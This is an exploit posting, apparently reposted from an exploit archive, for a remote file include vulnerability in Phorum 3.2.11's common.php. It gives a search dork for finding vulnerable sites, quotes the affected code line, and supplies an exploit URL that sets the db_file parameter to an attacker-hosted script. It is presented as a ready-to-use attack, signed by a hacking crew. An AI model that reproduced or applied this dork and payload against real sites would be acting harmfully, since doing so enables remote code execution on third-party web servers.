id: 1236
date: 12/06/2006
title: Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
author: Mr-m07
cves: 

===============================================================
Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
===============================================================



===========================================================
Yee7TeaM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
===========================================================



#  0day.today [2023-03-27]  #